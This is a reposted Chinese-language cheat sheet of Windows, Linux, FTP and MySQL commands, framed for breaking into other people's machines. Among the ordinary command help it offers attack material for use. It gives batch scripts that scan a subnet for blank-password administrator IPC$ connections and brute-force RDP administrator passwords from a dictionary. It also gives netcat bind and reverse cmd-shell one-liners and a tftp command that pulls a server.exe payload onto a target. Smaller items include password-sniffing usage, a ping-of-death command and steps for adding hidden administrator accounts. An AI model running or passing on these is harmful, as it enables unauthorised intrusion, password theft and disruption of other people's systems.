這些指令忘了在那個網站複製的, 但值得收藏備忘.#1 一:net use \\\\ip\\ipc$ " " /user:" " 建立IPC空鏈接net use \\\\ip\\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接net use h: \\\\ip\\c$ "密碼" /user:"用戶名" 直接登陸后映射對方C:到本地為H:net use h: \\\\ip\\c$ 登陸后映射對方C:到本地為H:net use \\\\ip\\ipc$ /del 刪除IPC鏈接net use h: /del 刪除映射對方到本地的為H:的映射net user 用戶名 密碼 /add 建立用戶net user guest /active:yes 激活guest用戶net user 查看有哪些用戶net user 帳戶名 查看帳戶的屬性net localgroup ***istrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權限,注意:***istrator后加s用復數net start 查看開啟了哪些服務net start 服務名 開啟服務;(如:net start telnet, net start schedule)net stop 服務名 停止某服務net time \\\\目標ip 查看對方時間net time \\\\目標ip /set 設置本地計算机時間與“目標IP”主机的時間同步,加上參數/yes可取消确認信息net view 查看本地局域網內開啟了哪些共享net view \\\\ip 查看對方局域網內開啟了哪些共享net config 顯示系統網絡設置net logoff 斷開連接的共享net pause 服務名 暫停某服務net send ip "文本信息" 向對方發信息net ver 局域網內正在使用的網絡連接類型和信息net share 查看本地開啟的共享net share ipc$ 開啟ipc$共享net share ipc$ /del 刪除ipc$共享net share c$ /del 刪除C:共享net user guest 12345 用guest用戶登陸后用將密碼改為12345net password 密碼 更改系統登陸密碼netstat -a 查看開啟了哪些端口,常用netstat -annetstat -n 查看端口的網絡連接情況,常用netstat -annetstat -v 查看正在進行的工作netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)netstat -s 查看正在使用的所有協議使用情況nbtstat -A ip 對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫tracert -參數 ip(或計算机名) 跟蹤路由(數据包),參數:“-w數字”用于設置超時間隔。ping ip(或域名) 向對方主机發送默認大小為32字節的數据,參數:“-l[空格]數据包大小”;“-n發送數据次數”;“-t”指一直ping。ping -t -l 65550 ip 死亡之ping(發送大于64K的文件並一直ping就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置信息tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件,“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件#2 二:del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統确認就直接刪除。(二個命令作用相同)move 盤符\\路徑\\要移動的文件名 存放移動文件的路徑\\移動后文件名 移動文件,用參數/y將取消确認移動目錄存在相同文件的提示就直接覆蓋fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令at id號 開啟已注冊的某個計划任務at /delete 停止所有計划任務,用參數/yes則不需要确認就直接停止at id號 /delete 停止某個已注冊的計划任務at 查看所有的計划任務at \\\\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算机finger username @host 查看最近有哪些用戶登陸telnet ip 端口 遠和登陸服務器,默認端口為23open ip 連接到IP(屬telnet登陸后的命令)telnet 在本机上直接鍵入telnet 將進入本机的telnetcopy 路徑\\文件名1 路徑\\文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消确認你要改寫一份現存目錄文件copy c:\\srv.exe \\\\ip\\***$ 復制本地c:\\srv.exe到對方的***下cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件copy \\\\ip\\***$\\svv.exe c:\\ 或:copy\\\\ip\\***$\\*.* 復制對方***i$共享下的srv.exe文件(所有文件)至本地C:xcopy 要復制的文件或目錄樹 目標地址\\目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件tftp -i 自己IP(用肉机作跳板時這用肉机IP) get server.exe c:\\server.exe 登陸后,將“IP”的server.exe下載到目標主机c:\\server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送tftp -i 對方IP put c:\\server.exe 登陸后,上傳本地c:\\server.exe至主机ftp ip 端口 用于上傳文件至服務器或進行文件操作,默認端口為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)route print 顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask,網關地址Gateway addres,接口地址Interfacearp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令mem 查看cpu使用情況attrib 文件名(目錄名) 查看某文件(目錄)的屬性attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間set 指定環境變量名稱=要指派給變量的字符 設置環境變量set 顯示當前所有的環境變量set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量pause 暫停批處理程序,並顯示出:請按任意鍵繼續....if 在批處理程序中執行條件處理(更多說明見if命令及變量)goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:“:start”標簽)call 路徑\\批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變量)echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置echo 信息 在屏幕上顯示出信息echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hellofind 文件名 查找某文件title 標題名字 更改CMD窗口標題名字color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\\、D:\\統一改為:EntSky\\ )#3 三:ver 在DOS窗口下顯示版本信息winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算机名)format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFSmd 目錄名 創建目錄replace 源文件 要替換文件的目錄 替換文件ren 原文件名 新文件名 重命名文件名tree 以樹形結构顯示出目錄,用參數-f 將列出第個文件夾中文件名稱type 文件名 顯示文本文件的內容more 文件名 逐屏顯示輸出文件doskey 要鎖定的命令=字符doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=taskmgr 調出任務管理器chkdsk /F D: 檢查磁盤D並顯示狀態報告;加參數/f並修復磁盤上的錯誤tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端口23為其它任何端口exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exepath 路徑\\可執行文件的文件名 為可執行文件設置一個路徑。cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;regedit /e 注冊表文件名 導出注冊表cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問權限;/G 用戶名:perm 賦予指定用戶訪問權限;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\\test.txt /D pub 設定d:\\test.txt拒絕pub用戶訪問。cacls 文件名 查看文件的訪問用戶權限列表REM 文本內容 在批處理文件中添加注解netsh 查看或更改本地網絡配置情況#4 四:IIS服務命令:iisreset /reboot 重啟win2k計算机(但有提示系統將重啟信息出現)iisreset /start或stop 啟動(停止)所有Internet服務iisreset /restart 停止然后重新啟動所有Internet服務iisreset /status 顯示所有Internet服務狀態iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開机iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開机。預設值為重新啟動20秒,停止60秒,重新開机0秒。FTP 命令: (后面有詳細說明內容)ftp的命令行格式為:ftp -v -d -i -n -g[主机名] -v 顯示遠程服務器的所有響應信息。-d 使用調試方式。-n 限制ftp的自動登錄,即不使用.netrc文件。-g 取消全局文件名。help [命令] 或 ?[命令] 查看命令說明bye 或 quit 終止主机FTP進程,並退出FTP管理方式.pwd 列出當前遠端主机目錄put 或 send 本地文件名 [上傳到主机上的文件名] 將本地一個文件傳送至遠端主机中get 或 recv [遠程主机文件名] [下載到本地后的文件名] 從遠端主机中傳送至本地主机中mget [remote-files] 從遠端主机接收一批文件至本地主机mput local-files 將本地主机中一批文件傳送至遠端主机dir 或 ls [remote-directory] [local-file] 列出當前遠端主机目錄中的文件.如果有本地文件,就將結果寫至本地文件ascii 設定以ASCII方式傳送文件(缺省值)bin 或 image 設定以二進制方式傳送文件bell 每完成一次文件傳送,報警提示cdup 返回上一級目錄close 中斷與遠程服務器的ftp會話(與open對應)open host[port] 建立指定ftp服務器連接,可指定連接端口delete 刪除遠端主机中的文件mdelete [remote-files] 刪除一批文件mkdir directory-name 在遠端主机中建立目錄rename [from] [to] 改變遠端主机中的文件名rmdir directory-name 刪除遠端主机中的目錄status 顯示當前FTP的狀態system 顯示遠端主机系統類型user user-name [password] [account] 重新以別的用戶名登錄遠端主机open host [port] 重新建立一個新的連接prompt 交互提示模式macdef 定義宏命令lcd 改變當前本地主机的工作目錄,如果缺省,就轉到當前用戶的HOME目錄chmod 改變遠端主机的文件權限case 當為ON時,用MGET命令拷貝的文件名到本地机器中,全部轉換為小寫字母cd remote-dir 進入遠程主机目錄cdup 進入遠程主机目錄的父目錄! 在本地机中執行交互shell,exit回到ftp環境,如!ls*.zip#5 五:MYSQL 命令:mysql -h主机地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。(例:mysql -h110.110.110.110 -Uroot -P123456注:u與root可以不用加空格,其它也一樣)exit 退出MYSQLmysql*** -u用戶名 -p舊密碼 password 新密碼 修改密碼grant select on 數据庫.* to 用戶名@登錄主机 identified by \\"密碼\\"; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以后面都帶一個分號作為命令結束符)show databases; 顯示數据庫列表。剛開始時才兩個數据庫:mysql和test。mysql庫很重要它里面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。use mysql;show tables; 顯示庫中的數据表describe 表名; 顯示數据表的結构create database 庫名; 建庫use 庫名;create table 表名 (字段設定列表); 建表drop database 庫名;drop table 表名; 刪庫和刪表delete from 表名; 將表中記錄清空select * from 表名; 顯示表中的記錄mysqldump --opt school>school.bbb 備份數据庫:(命令在DOS的\\\\mysql\\\\bin目錄下執行);注釋:將數据庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。win2003系統下新增命令(實用部份):shutdown /參數 關閉或重啟本地或遠程主机。參數說明:/S 關閉主机,/R 重啟主机, /T 數字 設定延時的時間,范圍0~180秒之間, /A取消開机,/M //IP 指定的遠程主机。例:shutdown /r /t 0 立即重啟本地主机(無延時)taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。tasklist 顯示當前運行在本地和遠程主机上的進程、服務、服務各進程的進程標識符(PID)。參數說明:/M 列出當前進程加載的dll文件,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。#6 六:Linux系統下基本命令: 要區分大小寫uname 顯示版本信息(同win2K的 ver)dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件(同win2K的 dir)pwd 查詢當前所在的目錄位置cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。cat 文件名 查看文件內容cat >abc.txt 往abc.txt文件中寫上內容。more 文件名 以一頁一頁的方式顯示一個文本文件。cp 復制文件mv 移動文件rm 文件名 刪除文件,rm -a 目錄名刪除目錄及子目錄mkdir 目錄名 建立目錄rmdir 刪除子目錄,目錄內沒有文檔。chmod 設定檔案或目錄的存取權限grep 在檔案中查找字符串diff 檔案文件比較find 檔案搜尋date 現在的日期、時間who 查詢目前和你使用同一台机器的人以及Login時間地點w 查詢目前上机者的詳細資料whoami 查看自己的帳號名稱groups 查看某人的Grouppasswd 更改密碼history 查看自己下過的命令ps 顯示進程狀態kill 停止某進程gcc 黑客通常用它來編譯C語言寫的文件su 權限轉換為指定使用者telnet IP telnet連接對方主机(同win2K),當出現bash$時就說明連接成功。ftp ftp連接上某服務器(同win2K)批處理命令與變量:1:for命令及變量 基本格式:FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i 不等于 %I)。批處理每次能處理的變量從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use \\\\ip\\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3(set):指定一個或一組文件,可使用通配符,如:(D:\\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1 }command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開command_parameters:為特定命令指定參數或命令行開關IN (set):指在(set)中取值;DO command :指執行command參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從文件中不斷取值,直到取完為止{ (set)為文件時,如(d:\\pass.txt)時 }。用法舉例:@echo offecho 用法格式:test.bat *.*.* > test.txtfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\\\%1.%%G /user:***istrator find "命令成功完成" >>test.txt存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立***istrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的 %1;%%G 為變量(ip的最后一位);& 用來隔開echo 和net use 這二個命令; 指建立了ipc$后,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。@echo offecho 用法格式:ok.bat ipFOR /F %%i IN (D:\\user.dic) DO smb.exe %1 %%i D:\\pass.dic 200存為:ok.exe 說明:輸入一個IP后,用字典文件d:\\pass.dic來暴解d:\\user.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。#7 七:2:if命令及變量 基本格式:IF [not] errorlevel 數字 命令語句 如果程序運行最后返回一個等于或大于指定數字的退出編碼,指定條件為“真”。例:IF errorlevel 0 命令 指程序執行后返回的值為0時,就值行后面的命令;IF not errorlevel 1 命令指程序執行最后返回的值不等于1,就執行后面的命令。0 指發現並成功執行(真);1 指沒有發現、沒執行(假)。IF [not] 字符串1==字符串2 命令語句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就執行后面的命令。例:“if "%2%"=="4" goto start”指:如果輸入的第二個變量為4時,執行后面的命令(注意:調用變量時就%變量名%並加" ")IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行后面的命令。例:“if not nc.exe goto end”指:如果沒有發現nc.exe文件就跳到":end"標簽處。IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else 命令語句后指:當前面的條件不成立時,就指行else后面的命令。注意:else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >后就等于是單獨一行了;例如:“if exist test.txt. else echo test.txt.missing ”,注意命令中的“.”(二)系統外部命令(均需下載相關工具):1、瑞士軍刀:nc.exe參數說明:-h 查看幫助信息-d 后台模式-e prog程序重定向,一但連接就執行〔危險〕-i secs延時的間隔-l 監听模式,用于入站連接-L 監听模式,連接天閉后仍然繼續監听,直到CTR+C-n IP地址,不能用域名-o film記錄16進制的傳輸-p[空格]端口 本地端口號-r 隨机本地及遠程端口-t 使用Telnet交互方式-u UDP模式-v 詳細輸出,用-vv將更詳細-w數字 timeout延時間隔-z 將輸入,輸出關掉(用于掃錨時)基本用法:nc -nvv 192.168.0.1 80 連接到192.168.0.1主机的80端口nc -l -p 80 開啟本机的TCP 80端口並監听nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主机的cmdshell在remote的TCP 5354端口nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell並反向連接192.168.0.2的5354端口高級用法:nc -L -p 80 作為蜜罐用1:開啟並不停地監听80端口,直到CTR+C為止nc -L -p 80 > c:\\log.txt 作為蜜罐用2:開啟並不停地監听80端口,直到CTR+C,同時把結果輸出到c:\\log.txtnc -L -p 80 <> 存放文件的路徑及名稱 傳送文件到對方主机備 注:管道命令< 或 > 重定向命令。“<”,例如:tlntadmn <>> d:\\log.txt 意思是:后台執行dir,並把結果存在d:\\log.txt中>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。如:@dir c:\\winnt >> d:\\log.txt和@dir c:\\winnt > d:\\log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了。#8 八:2、掃錨工具:xscan.exe基本格式xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主机信息xscan -file <主机列表文件名> <檢測項目> [其他選項] 掃錨"主机IP列表文件名"中的所有主机信息檢測項目-active 檢測主机是否存活-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)-port 檢測常用服務的端口狀態-ftp 檢測FTP弱口令-pub 檢測FTP服務匿名用戶寫權限-pop3 檢測POP3-Server弱口令-smtp 檢測SMTP-Server漏洞-sql 檢測SQL-Server弱口令-smb 檢測NT-Server弱口令-iis 檢測IIS編碼/解碼漏洞-cgi 檢測CGI漏洞-nasl 加載Nessus攻擊腳本-all 檢測以上所有項目其它選項-i 適配器編號 設置網絡適配器, <適配器編號>可通過"-l"參數獲取-l 顯示所有網絡適配器-v 顯示詳細掃描進度-p 跳過沒有響應的主机-o 跳過沒有檢測到開放端口的主机 -t 並發線程數量,並發主机數量 指定最大並發線程數量和並發主机數量, 默認數量為100,10-log 文件名 指定掃描報告文件名 (后綴為:TXT或HTML格式的文件)用法示例xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主机的所有漏洞,跳過無響應的主机xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主机的標准端口狀態,NT弱口令用戶,最大並發線程數量為150,跳過沒有檢測到開放端口的主机xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測“hostlist.txt”文件中列出的所有主机的標准端口狀態,CGI漏洞,最大並發線程數量為200,同一時刻最多檢測5台主机,顯示詳細檢測進度,跳過沒有檢測到開放端口的主机www.jz5u.com#9 九:3、命令行方式嗅探器: xsniff.exe可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼參數說明-tcp 輸出TCP數据報-udp 輸出UDP數据報-icmp 輸出ICMP數据報-pass 過濾密碼信息-hide 后台運行-host 解析主机名-addr IP地址 過濾IP地址-port 端口 過濾端口-log 文件名 將輸出保存到文件-asc 以ASCII形式輸出-hex 以16進制形式輸出用法示例xsniff.exe -pass -hide -log pass.log 后台運行嗅探密碼並將密碼信息保存在pass.log文件中xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出4、終端服務密碼破解: tscrack.exe參數說明-h 顯示使用幫助-v 顯示版本信息-s 在屏幕上打出解密能力-b 密碼錯誤時發出的聲音-t 同是發出多個連接(多線程)-N Prevent System Log entries on targeted server-U 卸載移除tscrack組件-f 使用-f后面的密碼-F 間隔時間(頻率)-l 使用-l后面的用戶名-w 使用-w后面的密碼字典-p 使用-p后面的密碼-D 登錄主頁面用法示例tscrack 192.168.0.1 -l ***istrator -w pass.dic 遠程用密碼字典文件暴破主机的***istrator的登陸密碼tscrack 192.168.0.1 -l ***istrator -p 123456 用密碼123456遠程登陸192.168.0.1的***istrator用戶@if not exist ipcscan.txt goto noscan@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%inscan@echo 3389.txt no find or scan faild(?存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主机IP列表文件3389.txt)3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat@if not exist tscrack.exe goto noscan@tscrack %1 -l ***istrator -w pass.dic >>rouji.txt:noscan@echo tscrack.exe no find or scan faild(?存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主机的***istrator密碼,並將破解結果保存在rouji.txt文件中。5、其它:Shutdown.exeShutdown \\\\IP地址 t:20 20秒后將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。)fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細說明(端口重定向繞過防火墻)fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80端口時,他掃到的結果會完全是www.sina.com.cn的主机信息Fpipe -l 23 -s 88 -r 23 目標IP 把本机向目標IP發送的23端口Telnet請求經端口重定向后,就通過88端口發送到目標IP的23端口。(與目標IP建立Telnet時本机就用的88端口與其相連接)然后:直接Telnet 127.0.0.1(本机IP)就連接到目標IP的23端口了。OpenTelnet.exe (遠程開啟telnet工具)opentelnet.exe \\\\IP 帳號 密碼 ntlm認証方式 Telnet端口 (不需要上傳ntlm.exe破坏微軟的身份驗証方式)直接遠程開啟對方的telnet服務后,就可用telnet \\\\ip 連接上對方。NTLM認証方式:0:不使用NTLM身份驗証;1:先嘗試NTLM身份驗証,如果失敗,再使用用戶名和密碼;2:只使用NTLM身份驗証。ResumeTelnet.exe (OpenTelnet附帶的另一個工具)resumetelnet.exe \\\\IP 帳號 密碼 用Telnet連接完對方后,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。#10 十:6、FTP命令詳解:FTP命令是Internet用戶使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。如果你想學習使用進行后台FTP下載,那麼就必須學習FTP指令。FTP的命令行格式為:ftp -v -d -i -n -g [主机名] ,其中-v 顯示遠程服務器的所有響應信息;-n 限制ftp的自動登錄,即不使用;.n etrc文件;-d 使用調試方式;-g 取消全局文件名。FTP使用的內部命令如下(中括號表示可選項):1.![cmd[args]]:在本地机中執行交互shell,exit回到ftp環境,如:!ls*.zip2.$ macro-ame[args]: 執行宏定義macro-name。3.account[password]: 提供登錄遠程系統成功后訪問系統資源所需的補充口令。4.append local-file[remote-file]:將本地文件追加到遠程系統主机,若未指定遠程系統文件名,則使用本地文件名。5.ascii:使用ascii類型傳輸方式。6.bell:每個命令執行完畢后計算机響鈴一次。7.bin:使用二進制文件傳輸方式。8.bye:退出ftp會話過程。9.case:在使用mget時,將遠程主机文件名中的大寫轉為小寫字母。10.cd remote-dir:進入遠程主机目錄。11.cdup:進入遠程主机目錄的父目錄。12.chmod mode file-name:將遠程主机文件file-name的存取方式設置為mode,如:chmod 777 a.out。13.close:中斷與遠程服務器的ftp會話(與open對應)。14.cr:使用asscii方式傳輸文件時,將回車換行轉換為回行。15.delete remote-file:刪除遠程主机文件。16.debug[debug-value]:設置調試方式, 顯示發送至遠程主机的每條命令,如:deb up 3,若設為0,表示取消debug。17.dir[remote-dir][local-file]:顯示遠程主机目錄,並將結果存入本地文件。18.disconnection:同close。19.form format:將文件傳輸方式設置為format,缺省為file方式。20.get remote-file[local-file]: 將遠程主机的文件remote-file傳至本地硬盤的local-file。21.glob:設置mdelete,mget,mput的文件名擴展,缺省時不擴展文件名,同命令行的-g參數。22.hash:每傳輸1024字節,顯示一個hash符號(#)。23.help[cmd]:顯示ftp內部命令cmd的幫助信息,如:help get。24.idle[seconds]:將遠程服務器的休眠計時器設為[seconds]秒。25.image:設置二進制傳輸方式(同binary)。26.lcd[dir]:將本地工作目錄切換至dir。27.ls[remote-dir][local-file]:顯示遠程目錄remote-dir, 並存入本地文件local-file。28.macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。29.mdelete[remote-file]:刪除遠程主机文件。30.mdir remote-files local-file:與dir類似,但可指定多個遠程文件,如 :mdir *.o.*.zipoutfile 。31.mget remote-files:傳輸多個遠程文件。32.mkdir dir-name:在遠程主机中建一目錄。33.mls remote-file local-file:同nlist,但可指定多個文件名。34.mode[modename]:將文件傳輸方式設置為modename, 缺省為stream方式。35.modtime file-name:顯示遠程主机文件的最后修改時間。36.mput local-file:將多個文件傳輸至遠程主机。37.newer file-name: 如果遠程机中file-name的修改時間比本地硬盤同名文件的時間更近,則重傳該文件。38.nlist[remote-dir][local-file]:顯示遠程主机目錄的文件清單,並存入本地硬盤的local-file。39.nmap[inpattern outpattern]:設置文件名映射机制, 使得文件傳輸時,文件中的某些字符相互轉換, 如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變為a1,a2。 該命令特別適用于遠程主机為非UNIX机的情況。40.ntrans[inchars[outchars]]:設置文件名字符的翻譯机制,如ntrans1R,則文件名LLL將變為RRR。41.open host[port]:建立指定ftp服務器連接,可指定連接端口。42.passive:進入被動傳輸方式。43.prompt:設置多個文件傳輸時的交互提示。44.proxy ftp-cmd:在次要控制連接中,執行一條ftp命令, 該命令允許連接兩個ftp服務器,以在兩個服務器間傳輸文件。第一條ftp命令必須為open,以首先建立兩個服務器間的連接。45.put local-file[remote-file]:將本地文件local-file傳送至遠程主机。46.pwd:顯示遠程主机的當前工作目錄。47.quit:同bye,退出ftp會話。48.quote arg1,arg2...:將參數逐字發至遠程ftp服務器,如:quote syst.49.recv remote-file[local-file]:同get。50.reget remote-file[local-file]:類似于get, 但若local-file存在,則從上次傳輸中斷處續傳。51.rhelp[cmd-name]:請求獲得遠程主机的幫助。52.rstatus[file-name]:若未指定文件名,則顯示遠程主机的狀態, 否則顯示文件狀態。53.rename[from][to]:更改遠程主机文件名。54.reset:清除回答隊列。55.restart marker:從指定的標志marker處,重新開始get或put,如:restart 130。56.rmdir dir-name:刪除遠程主机目錄。57.runique:設置文件名只一性存儲,若文件存在,則在原文件后加后綴.1, .2等。58.send local-file[remote-file]:同put。59.sendport:設置PORT命令的使用。60.site arg1,arg2...:將參數作為SITE命令逐字發送至遠程ftp主机。61.size file-name:顯示遠程主机文件大小,如:site idle 7200。62.status:顯示當前ftp狀態。www.jz5u.com63.struct[struct-name]:將文件傳輸結构設置為struct-name, 缺省時使用stream結构。64.sunique:將遠程主机文件名存儲設置為只一(與runique對應)。65.system:顯示遠程主机的操作系統類型。66.tenex:將文件傳輸類型設置為TENEX机的所需的類型。67.tick:設置傳輸時的字節計數器。68.trace:設置包跟蹤。69.type[type-name]:設置文件傳輸類型為type-name,缺省為ascii,如:type binary,設置二進制傳輸方式。70.umask[newmask]:將遠程服務器的缺省umask設置為newmask,如:umask 371.user user-name[password][account]:向遠程主机表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email。72.verbose:同命令行的-v參數,即設置詳盡報告方式,ftp 服務器的所有響 應都將顯示給用戶,缺省為on.73.?[cmd]:同help.#11 十一:7:計算机運行命令全集 winver---------檢查Windows版本wmimgmt.msc----打開windows管理體系結构wupdmgr--------windows更新程序winver---------檢查Windows版本wmimgmt.msc----打開windows管理體系結构wupdmgr--------windows更新程序wscript--------windows腳本宿主設置write----------寫字板winmsd-----系統信息wiaacmgr-------掃描儀和照相机向導winchat--------XP自帶局域網聊天mem.exe--------顯示內存使用情況Msconfig.exe---系統配置實用程序mplayer2-------簡易widnows media playermspaint--------畫圖板mstsc----------遠程桌面連接mplayer2-------媒體播放机magnify--------放大鏡實用程序mmc------------打開控制台mobsync--------同步命令dxdiag---------檢查DirectX信息drwtsn32------ 系統醫生devmgmt.msc--- 